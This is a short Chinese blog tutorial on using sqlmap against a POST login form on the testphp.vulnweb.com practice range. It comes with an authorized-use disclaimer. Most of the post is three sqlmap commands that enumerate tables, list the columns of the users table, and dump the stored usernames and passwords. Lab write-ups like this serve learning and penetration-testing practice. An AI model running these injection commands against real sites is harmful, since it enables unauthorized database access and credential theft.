046 sqlmap-post

本文仅作为技术文档记录,学习使用,请合法合规,严格遵守《中华人民共和国网络安全法》。一切未经授权的渗透测试行为都是违法违规的。

靶场地址:http://testphp.vulnweb.com/login.php

post请求sqlmap语句

python .\sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --tables 

python .\sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --columns -T users

python .\sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --dump -C "name,pass" -T users

与get请求相比的话 就是多了一个--data "表单数据"

依旧是 --tables 猜数据库

columns -T users 猜表

dump -C "name,pass"-T users 猜解数据

抓取登录数据包表单数据:uname=test&pass=test

所以我们的注入语句应该是:python .\sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --tables 

现在要对users进行操作 所以接下来的语句是

python .\sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --columns -T users

接下来拆解 name和pass

python .\sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --dump -C "name,pass" -T users

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值